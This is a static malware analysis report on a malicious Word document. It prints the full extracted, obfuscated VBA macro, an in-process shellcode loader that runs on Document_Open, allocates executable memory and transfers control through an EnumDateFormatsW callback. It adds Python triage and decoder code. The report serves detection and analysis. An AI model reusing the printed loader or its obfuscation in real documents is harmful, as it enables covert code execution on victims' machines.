Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 56e2f3536404976a…

MALICIOUS

Office (OLE)

Size: 147.5 KB
Created: 2016-10-31 14:19:00
Authoring application: Microsoft Office Word
First seen: 2016-11-10
MD5: 4e12833f7fd7a170b3b39b9ab0d29a3d
SHA-1: daedda492b743b32886e689083fab001f54effa2
SHA-256: 56e2f3536404976afeecd99080a597bb39152aa8d236de39c4ebbb94bb96bbba
Risk score: 190

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1140 Deobfuscate/Decode Files or Information
  • T1204.002 User Execution: Malicious File

The sample is a Word document whose VBA project auto-executes `myology` from `Document_Open`. In the visible source the macro is a self-contained in-process shellcode loader rather than a downloader. It reads an encoded string from the ControlTipText property of a control on the `jackstraws` UserForm (`jackstraws.zombi.halfmoon.Page2.llano`), keeps the last 7368 characters (`Right(allfours, 7368)`), and decodes them in `halt.preoption`: every character is shifted by +4 and the result is run through a standard base64 table, yielding 5526 bytes. `cyme` then allocates 7383 bytes of executable memory through the import declared as `abnegation`, which is `VirtualAllocEx` called with process handle -1 (the current process), `MEM_COMMIT` (4096) and `PAGE_EXECUTE_READWRITE` (64), and copies the decoded buffer into it with `consignificative` (`RtlMoveMemory`, after pulling the BSTR pointer out of the Variant that holds the decoded string). `myology` finally transfers control by passing an address inside that buffer as the callback argument of `walks` (`EnumDateFormatsW`); the entry offset differs per build, 3677 bytes into the buffer under 32-bit Office and 1280 under 64-bit. The other declared imports (`FindWindowA`, `GetClassNameA`, `RegisterClassW`, `GetDC`, `GetModuleHandle`) are never called, and `CreateMemo` and `Open_MSWord` are copied Word-automation snippets that reference Excel objects and are not reachable from `Document_Open`; they are padding. The `GetObject` finding comes from `CreateMemo`, not from the execution path, and the 'VirtualAlloc' string match is the `VirtualAllocEx` alias. The `Document_Open` entry point, the renamed imports and the decode-allocate-copy-callback chain are sufficient for a malicious verdict, and the ClamAV signature `Doc.Malware.Valyria-10023899-0` agrees. Whether the shellcode downloads a second stage is not visible from the macro source; that would need the decoded buffer or a dynamic run.

Heuristics (7)

  • ClamAV: Doc.Malware.Valyria-10023899-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10023899-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
    Matched line in script:
        myArray = Array("To", "CC", "From", "Subject", "Chart")
        Set wdApp = GetObject(, "Word.Application")
    The match is inside CreateMemo, a Word-automation snippet that nothing calls; the auto-exec path runs through myology.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) stream contains an auto-execution token together with shell, download or object-execution tokens. This heuristic also catches p-code-only documents and documents whose source extraction fails, where no visible source is available.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
        Private Sub Document_Open()
        Dim housekeeping As Integer
  • Reference to VirtualAlloc API [medium] SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API. The string match is the Alias "VirtualAllocEx" in the halt module, bound to the VBA name abnegation and called with process handle -1, MEM_COMMIT (4096) and PAGE_EXECUTE_READWRITE (64).
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
      • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
      • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
      • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
      • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
      • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
      • http://ns.adobe.com/camera-raw-settings/1.0/ (in document text, OLE body)
      • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    All eight are XMP/RDF schema namespace identifiers (Adobe XMP, Dublin Core, RDF), which is what the metadata block of an embedded image contains. They are schema URIs, not network indicators, and should not be treated as C2.
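
One gap the findings above show is that the sample's VBA-level names (`abnegation`, `consignificative`, `walks`) say nothing by themselves; the real Win32 export is in the `Alias` string of each `Declare`. The following Python triage is an added example, not the report tool's own heuristic: it resolves those bindings and flags the in-process shellcode-loader shape the extracted script has, that is an executable-memory allocator, a memory-copy routine and an API that takes a callback pointer (how this sample gets control into the buffer instead of `CreateThread`), together with an auto-exec entry point and a payload read from a form-control property. The API groups and the form-property list are my own selection, not a published ruleset, and the excerpt is taken from the `macros.bas` shown further down.

```python
"""Alias-resolving triage of VBA Declare statements (added example).

Maps each VBA-level name to the real DLL export it is bound to, then flags the
allocate / copy / callback-execute combination used by the extracted script.
"""
from __future__ import annotations
import re

DECLARE_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+'
    r'(?P<name>\w+)\s+Lib\s+"(?P<lib>[^"]+)"(?:\s+Alias\s+"(?P<alias>[^"]+)")?',
    re.IGNORECASE | re.MULTILINE,
)
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+(Document_Open|AutoOpen|Auto_Open|Workbook_Open)\b',
    re.IGNORECASE | re.MULTILINE,
)
# Form-control properties whose values live in the form storage, not in the VBA
# source, so a source-only review never sees the payload. My list, not a standard.
FORM_STASH_RE = re.compile(r'\.(ControlTipText|Tag)\b')

# API groups (my selection). A callback-taking API lets the macro run a buffer
# without CreateThread; EnumDateFormatsW is the one this sample uses.
ALLOC_APIS = {"VirtualAlloc", "VirtualAllocEx", "NtAllocateVirtualMemory"}
COPY_APIS = {"RtlMoveMemory", "RtlCopyMemory", "WriteProcessMemory"}
CALLBACK_EXEC_APIS = {
    "EnumDateFormatsA", "EnumDateFormatsW", "EnumSystemLocalesA", "EnumSystemLocalesW",
    "EnumWindows", "EnumChildWindows", "CallWindowProcA", "CallWindowProcW",
    "CreateThread", "CreateRemoteThread", "QueueUserAPC",
}

# Excerpt of the extracted macros.bas (Document_Open, the form-property read and
# five of the Declare lines); the rest of the script is omitted here.
EXCERPT = '''Private Sub Document_Open()
myology
End Sub
Sub myology()
allfours = jackstraws.zombi.halfmoon.Page2.llano.ControlTipText
End Sub
Public Declare PtrSafe Function nabalus Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
Public  Declare PtrSafe Function abnegation Lib "kernel32" Alias "VirtualAllocEx" (ByVal noteworthy As LongPtr, ByVal prior As LongPtr, ByVal pawnshop As LongPtr, ByVal lukewarm As LongPtr, ByVal adjutant As LongPtr) As LongPtr
Public  Declare PtrSafe Sub consignificative Lib "ntdll.dll" Alias "RtlMoveMemory" (dissimulate As Any, aboral As Any, ByVal unsaid As LongPtr)
Public  Declare PtrSafe Function walks Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal flags As Any, ByVal lParam As Any) As LongPtr
Public Declare PtrSafe Function runon Lib "user32" Alias "FindWindowA" (steakhouse As LongPtr, climax As LongPtr) As LongPtr
'''


def resolve_declares(vba: str) -> dict[str, tuple[str, str]]:
    """VBA name -> (dll, export). Without an Alias the VBA name is the export itself."""
    bindings: dict[str, tuple[str, str]] = {}
    for m in DECLARE_RE.finditer(vba):
        lib = m.group("lib").lower().removesuffix(".dll")
        bindings[m.group("name")] = (lib, m.group("alias") or m.group("name"))
    return bindings


def triage(vba: str) -> dict:
    """Summarise the loader shape; 'shellcode_loader' is the combined verdict."""
    bindings = resolve_declares(vba)
    exports = {export for _, export in bindings.values()}
    result = {
        "alloc": sorted(exports & ALLOC_APIS),
        "copy": sorted(exports & COPY_APIS),
        "callback_exec": sorted(exports & CALLBACK_EXEC_APIS),
        "autoexec": sorted({m.group(1) for m in AUTOEXEC_RE.finditer(vba)}),
        "form_stash": sorted({m.group(1) for m in FORM_STASH_RE.finditer(vba)}),
        # VBA names that differ from their export: the renaming itself is a signal.
        "renamed_imports": {n: e for n, (_, e) in bindings.items() if n != e},
    }
    result["shellcode_loader"] = bool(
        result["alloc"] and result["copy"] and result["callback_exec"]
    )
    return result


if __name__ == "__main__":
    for key, value in triage(EXCERPT).items():
        print(f"{key}: {value}")
```

Run it against the full `macros.bas` rather than the excerpt in practice; because the regex ignores `#If Win64` directives it reports both the 32-bit and the 64-bit declaration sets, which is what you want, since either branch is a complete loader.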

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14270 bytes
SHA-256: 225b160eaf0d3bf152f650447d713b0ed63f4bd4275771e2543a064a3fada22e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim appall
Dim missive As Long
Dim conversing As String
Dim entendre As Long
Dim apostrophize As Integer
Dim soaker As Integer
Sub myology()
Dim abbatical As String
Dim chickenhearted As Long
allfours = jackstraws.zombi.halfmoon.Page2.llano.ControlTipText
myriapod = 88 + 52 - 34 + 7262
gondolier = Right(allfours, myriapod)
akimbo = halt.preoption(gondolier)
For galloon = 22 To 71
embioptera = 71
apostrophize = apostrophize - 135
sigmoidoscope = "cr" & "eese"
sigmoidoscope = Mid("battleaxengarganey", 9, 2) & "ologist"
Next galloon

aguish = "epi" & "dendr" & UCase$("on")
doily = LCase$("CO") & Mid("lashinglloitreacherous", 8, 4) & LCase$("D")
#If VBA6 And Win64 Then
Dim shantung As String
Dim dependent As derri
Dim idolatry As LongPtr
dependent.elseifstatement = 7 + 80 - 87
Dim safflower As Byte
#Else
Dim outlier As Integer
dependent = 0
Dim air As Long
Dim idolatry As Long
#End If
meal = 24 + 36 + 91 - 151
bimonthly = "bandicoot"
aloft = "egomania"
wk = 108 + 35 + 3953
endoderm = 3
While endoderm < 6
endoderm = endoderm + 1
apostrophize = soaker / 98
Wend

hock = "cebu"
jobation = "complicated"
diphylla = 10
While diphylla < 13
impracticably = LCase$("aC") & "cura" & Right$("clockwisete", 2)
diphylla = diphylla + 1
missive = soaker - 390
Wend

backwardness = akimbo
amourette = Mid("osmosissuclimactic", 8, 2) & LCase$("Btil") & Right$("ivryie", 2)
idolatry = cyme(backwardness)
beechnut = "sorority"
alt = "outset"
#If VBA6 And Win64 Then
Dim fibroblast As Byte
betrothment = LCase$("sU") & "cker"
sante = "appreciation"
acidification = 124 + 47 + 22 + 1087
#ElseIf (Win32) Then
balata = "protamine"
synergetic = "mealtime"
microtubule = "aufgeschoben"
foreandafter = 22 + 484
acidification = foreandafter + 3171

#End If
Dim sculptor As Variant
Dim taipei As String
Dim intrepidity As Long
intrepidity = 0
Dim avadavat As Long
avadavat = idolatry + acidification
liana = walks(avadavat, intrepidity, intrepidity)
For islamabad = 0 To 53
mariposan = 53
apostrophize = soaker - 476
showroom = UCase$("Sc") & UCase$("Ream") & Left("ingsulfacetamide", 3)
showroom = Mid("septcoscrapie", 5, 2) & Right$("neritinamble", 4)
Next islamabad

End Sub

Function cyme(peptization)
Dim letup As String
Dim uplifted As Variant
Dim cohobate As Long
consignificative cohobate, ByVal VarPtr(peptization) + 8, 4
Dim cheer As Integer
Dim scorzonera As Long
Dim antigropelos As Long
lubricous = 0
chetrum = 13 - 42 - 22 + 51
femtometer = 4096
disallowance = abnegation(-1, chetrum, 7383, femtometer, 64)
consignificative antigropelos, ByVal VarPtr(disallowance) + 8, 4
consignificative ByVal antigropelos, ByVal cohobate, 7392
For oscilloscope = 15 To 68
kishinev = 68
entendre = missive - 474
gath = Left("bronlicense", 2) & UCase$("aNDy") & "ball"
gath = LCase$("cOO") & Left("peratbranded", 5) & Mid("dryasioncercis", 6, 3)
Next oscilloscope

cyme = antigropelos
End Function
Sub CreateMemo()
    Dim myArray()
    Dim wdBkmk As String
    
    Dim wdApp As Word.Application
    Dim wdRng As Word.Range
    myArray = Array("To", "CC", "From", "Subject", "Chart")
    Set wdApp = GetObject(, "Word.Application")
    
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(0)).Range
    wdRng.InsertBefore ("B")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(1)).Range
    wdRng.InsertBefore ("T")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(2)).Range
    wdRng.InsertBefore ("M")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(3)).Range
    wdRng.InsertBefore ("F")
    
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(4)).Range
    ActiveSheet.ChartObjects("Chart 1").Copy
    wdRng.PasteAndFormat Type:=wdPasteOLEObject
    
    wdApp.Activate
    
    Set wdApp = Nothing
    Set wdRng = Nothing
End Sub

Private Sub Document_Open()
Dim housekeeping As Integer
Dim multiplied As Variant
odium = UCase$("Jo") & LCase$("LlItY")
immodest = "handwear"
myology
multiloquence = 66
advert = 78
If multiloquence + advert < 2 Then
multiloquence = Right$("brokeont", 3) & Mid("courtierlyogeneticanimi", 11, 8)
conversing = "andesite"
confidently = Left("applongheaded", 3) & Mid("collocutionoggiaturaunironed", 12, 9)
Else
appall = conversing
advert = 107
End If
End Sub

Attribute VB_Name = "halt"
'I can't watch things further complicate
'I can't watch things further complicate
#If VBA6 And Win64 Then
'I hope you won't be saddened while I cry about it
'this endless propaganda (corporate agenda)
Public Type derri
'I can't watch things further complicate
'have mercy please God erase us
elseifstatement As LongPtr
'so if it all fails just throw it back in my face and bury me
'have mercy please God erase us
End Type
'have mercy please God erase us
'have mercy please God erase us
Public Declare PtrSafe Function nabalus Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'on focusing destractions tear me open
'I can't watch things further complicate
Public Declare PtrSafe Function aise Lib "user32" Alias "RegisterClassW" (dabri As LongPtr) As LongPtr
'I hope that I don't bore you while I whine about it
'as soon as I escape there's more stagnant bullsshit
Public Declare PtrSafe Function nonnative Lib "user32" Alias "GetDC" (ByVal algin As LongPtr) As LongPtr
'all the thoughts in my head are constantly .. haunting me
'I'd like to think there's more something more
Public  Declare PtrSafe Function abnegation Lib "kernel32" Alias "VirtualAllocEx" (ByVal noteworthy As LongPtr, ByVal prior As LongPtr, ByVal pawnshop As LongPtr, ByVal lukewarm As LongPtr, ByVal adjutant As LongPtr) As LongPtr
'so if it all fails just throw it back in my face and bury me
'so if it all fails just throw it back in my face and bury me
Public  Declare PtrSafe Sub consignificative Lib "ntdll.dll" Alias "RtlMoveMemory" (dissimulate As Any, aboral As Any, ByVal unsaid As LongPtr)
'I keep telling myself that there's something more
'I hope you won't be saddened while I cry about it
Public Declare PtrSafe Function camelot Lib "user32" Alias "GetClassNameA" (calenture As LongPtr, ByVal perceptually As LongPtr,needful As LongPtr) As LongPtr
'I keep telling myself that there's something more
'all the thoughts in my head are constantly .. haunting me
Public  Declare PtrSafe Function walks Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal flags As Any, ByVal lParam As Any) As LongPtr
'on focusing destractions tear me open
'as soon as I escape there's more stagnant bullsshit
Public Declare PtrSafe Function runon Lib "user32" Alias "FindWindowA" (steakhouse As LongPtr, climax As LongPtr) As LongPtr
'this endless propaganda (corporate agenda)
'on focusing destractions tear me open

'on focusing destractions tear me open
'all the thoughts in my head are constantly .. haunting me
#Else
'so if it all fails just throw it back in my face and bury me
'so if it all fails just throw it back in my face and bury me
Public Declare Function disputant Lib "user32" Alias "FindWindowA" (walkin As Long, indexical As Long) As Long
'have mercy please God erase us
'I'd like to think there's more something more
Public Declare Function meteorologic Lib "user32" Alias "GetClassNameA" (irascible As Long, ByVal stationer As Long, cyprian As Long) As Long
'I hope that I don't bore you while I whine about it
'I keep telling myself that there's something more
Public Declare Sub consignificative Lib "ntdll.dll" Alias "RtlMoveMemory" (foreword As Any, brythonic As Any, ByVal enki As Long)
'so if it all fails just throw it back in my face and bury me
'I'd like to think there's more something more
Public Declare Function walks Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal constituency As Any, ByVal lParam As Any) As Long
'Let me breathe check destroy and upset
'I hope you won't be saddened while I cry about it
Public Declare Function dizdar Lib "user32" Alias "RegisterClassW" (shades As Long) As Long
'I keep telling myself that there's something more
'I hope that I don't bore you while I whine about it
Public Declare Function abnegation Lib "kernel32" Alias "VirtualAllocEx" (ByVal procid As Long, ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
'I hope that I don't bore you while I whine about it
'I hope that I don't bore you while I whine about it
Public Declare Function marsh Lib "user32" Alias "GetDC" (ideology As Long) As Long
'I hope that I don't bore you while I whine about it
'I can't watch things further complicate
Public Declare Function czechoslovakia Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'I can't watch things further complicate
'have mercy please God erase us

'I hope that I don't bore you while I whine about it
'I can't watch things further complicate
#End If
'this endless propaganda (corporate agenda)
'I hope that I don't bore you while I whine about it
Function buttocks(dominating, weisshorn)
buttocks = dominating \ weisshorn
End Function
Function carpeted(engorge, alertly)
carpeted = engorge * alertly
End Function
Function preoption(gametophyte) As String
Dim apc As Long
Dim consulate(63) As Long
Dim lallans As Long
Dim unusualness(63) As Long
appall = appall

Dim stanch() As Byte
appall = conversing

Dim papillate As Long
Dim defendant As String

Dim accretion As String
Dim pageant As Byte

Dim opinionatist As Long
Dim aepyceros As Integer
Dim inconvertibility() As Byte
Dim tantalization(63) As Long
Dim announcer As Long

Dim poussecafe(255) As Byte
aes = 49 - 86 + 4069
iroin = 255
Dim prefectural As Variant

powered = 63
avitaminotic = 65280
repetitionary = 65536
plumping = 103 + 16711577
damaliscus = 102 - 49 + 106 + 261985
deuterogamy = 16515072
aeronatics = 128 + 51 + 257869
sustenance = 109 + 125 - 32 + 54
hospodar = 78 - 6 - 8
Dim beachhead As Integer

ptolemy = 20 + 4076
Dim moisture As Long

Dim cordage As Integer
Dim ballhawking() As Byte
ReDim ballhawking(7367)
suscipient = 7368
For anthrax = 1 To suscipient
individualist = Mid(gametophyte, anthrax, 1)
gaol = UCase$("mY") & LCase$("A")
fullgrown = (Asc(individualist))
ballhawking(anthrax - 1) = fullgrown
Next
Dim nursemaid As Byte
For acorea = 12 To 69
roost = 69
entendre = apostrophize \ 475
anchusa = UCase$("hea") & "rtwou" & LCase$("nding")
anchusa = Left("seflautist", 2) & UCase$("lFDe") & UCase$("cEpTIOn")
Next acorea

athene = 7367
mattre = 40 + 29 - 34
For sos = 0 To athene
ballhawking(sos) = ballhawking(sos) + 4
Next sos
wriggle = 88
tostada = 85
If wriggle + tostada < 19 Then
wriggle = UCase$("an") & LCase$("iMat") & LCase$("EDly")
conversing = "anseriformes"
leiodermatous = UCase$("FO") & UCase$("rEma") & LCase$("n")
Else
soaker = entendre \ 236
tostada = 38
End If

aepyceros = 0
approach = 122
adenopathy = 255
For lallans = 0 To adenopathy
Select Case lallans
Case 65 To 90
poussecafe(lallans) = lallans - 65
Case 97 To approach
poussecafe(lallans) = lallans - 71
Case 48 To 57
poussecafe(lallans) = lallans + 4
Case 43
poussecafe(lallans) = 62
Case 47
poussecafe(lallans) = 63
End Select
Next lallans
For lallans = 0 To 63
tantalization(lallans) = carpeted(lallans, hospodar)
consulate(lallans) = carpeted(lallans, ptolemy)
unusualness(lallans) = carpeted(lallans, damaliscus)
Next lallans
For jargoon = 2 To 55
communicatory = 55
appall = "cilia"
beanie = LCase$("Out") & LCase$("BaLANce")
beanie = LCase$("Acq") & UCase$("UiSitiVE")
Next jargoon

stanch = ballhawking
consequential = 4
ReDim inconvertibility((((7367 + 1) \ consequential) * 3) - 1)
For puffer = 19 To 52
daedal = 52
appall = appall
hugo = UCase$("Ba") & Right$("grampositivesina", 4) & Right$("foolsl", 1)
hugo = Left("patplating", 3) & Left("riotismmutton", 7)
Next puffer

phthorimaea = 1 + 2
conversing = conversing

appall = "boundary"

perturbation = phthorimaea + 1
manihot = 114 - 112
For apc = 0 To athene Step perturbation
abaddon = stanch(apc)
papillate = unusualness(poussecafe(abaddon)) _
 + consulate(poussecafe(stanch(apc + 1))) + tantalization(poussecafe(stanch(apc + 2))) + poussecafe(stanch(apc + phthorimaea))
lallans = attritional(papillate, plumping)
inconvertibility(opinionatist) = buttocks(lallans, repetitionary)
lallans = attritional(papillate, avitaminotic)
inconvertibility(opinionatist + 1) = buttocks(lallans, sustenance)
inconvertibility(opinionatist + manihot) = attritional(papillate, iroin)
opinionatist = opinionatist + manihot + 1
Next apc
preoption = inconvertibility
End Function

Sub Open_MSWord()
    On Error GoTo errorHandler
    Dim wdApp As Word.Application
    Dim myDoc As Word.Document
    Dim mywdRange As Word.Range
    Set wdApp = New Word.Application
   
    With wdApp
        .Visible = True
        .WindowState = wdWindowStateMaximize
    End With
   
    Set myDoc = wdApp.Documents.Add
   
    Set mywdRange = myDoc.Words(1)
   
    With mywdRange
        .Text = Range("F6") & " This text is being used to test subroutine." & _
            "  More meaningful text to follow."
        .Font.Name = "Comic Sans MS"
        .Font.Size = 12
        .Font.ColorIndex = wdGreen
        .Bold = True
    End With
   
errorHandler:
   
    Set wdApp = Nothing
    Set myDoc = Nothing
    Set mywdRange = Nothing
End Sub

Function attritional(entoloma, peppy)
attritional = entoloma And peppy
End Function


Attribute VB_Name = "jackstraws"
Attribute VB_Base = "0{255C86C9-E166-49DD-9A77-87FD48DAA6D4}{3B18A146-55CD-42CC-9C7C-A1F8B82AE5F9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
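
The decoder in `halt.preoption` above, re-implemented in Python as an added example (it is not code from the sample or from the analysis tool). It mirrors the macro: every input character is shifted by +4, the result is looked up in a standard base64 table (characters outside the table map to 0, as the macro's zero-initialised lookup array does), and each group of four characters yields three bytes. The real blob is not on this page: `myology` reads it from the ControlTipText of a control on the `jackstraws` UserForm, and control properties live in the form's storage inside the VBA project rather than in the macro source, so they are not in the extracted `macros.bas`; dump the form streams (oledump.py or olefile will do) to recover it, then keep the last 7368 characters as `Right(allfours, 7368)` does. The input used below is constructed with the inverse transform.

```python
"""Python re-implementation of halt.preoption (added example, not the sample's
own code). Decodes the ControlTipText blob that the macro turns into shellcode."""
import base64

# Standard base64 alphabet, which is the table preoption builds (poussecafe):
# 'A'-'Z' -> 0-25, 'a'-'z' -> 26-51, '0'-'9' -> 52-61, '+' -> 62, '/' -> 63.
B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
SEXTET = {c: i for i, c in enumerate(B64_ALPHABET)}
SHIFT = 4          # ballhawking(sos) = ballhawking(sos) + 4
BLOB_LEN = 7368    # Right(allfours, 7368): the macro keeps the last 7368 characters

# Offsets added to the buffer address before EnumDateFormatsW is called
# (acidification in myology): 506 + 3171 on Win32, 124 + 47 + 22 + 1087 on Win64.
ENTRY_OFFSET = {"win32": 3677, "win64": 1280}


def unshift(blob: str) -> str:
    """Undo the obfuscation layer: add 4 to every character code."""
    return "".join(chr(ord(c) + SHIFT) for c in blob)


def decode_blob(blob: str) -> bytes:
    """Reproduce preoption: +4 shift, table lookup, four characters -> three bytes.

    Characters outside the table (for example base64 padding, which the
    encoder stores as '9') decode as 0, because the macro's lookup array
    is zero-initialised. No padding is stripped, exactly as in the macro.
    """
    if len(blob) % 4:
        raise ValueError("preoption consumes whole groups of 4 characters")
    shifted = unshift(blob)
    out = bytearray()
    for i in range(0, len(shifted), 4):
        s = [SEXTET.get(ch, 0) for ch in shifted[i:i + 4]]
        # unusualness / consulate / tantalization are the i<<18, i<<12, i<<6 tables
        v = (s[0] << 18) | (s[1] << 12) | (s[2] << 6) | s[3]
        out += bytes(((v >> 16) & 0xFF, (v >> 8) & 0xFF, v & 0xFF))
    return bytes(out)


def decode_control_tip(control_tip_text: str) -> bytes:
    """What myology does with the property value: decode its last BLOB_LEN characters."""
    return decode_blob(control_tip_text[-BLOB_LEN:])


def encode_blob(payload: bytes) -> str:
    """Inverse transform, used here only to build constructed test input."""
    return "".join(chr(ord(c) - SHIFT) for c in base64.b64encode(payload).decode())


if __name__ == "__main__":
    # Constructed stand-in for the real ControlTipText value, not the sample's blob.
    sample = encode_blob(b"\x90" * 30 + b"\xcc")
    buf = decode_blob(sample)
    print(len(sample), "chars ->", len(buf), "bytes:", buf.hex())
```

With the real property value, `decode_control_tip` returns the buffer that `cyme` copies into the RWX allocation; `ENTRY_OFFSET` tells you where in it to start disassembling for the build of Office that opened the document (the macro copies 7392 bytes, more than the 5526 the decoder produces, so anything past the decoded length is whatever followed the string in memory, not payload).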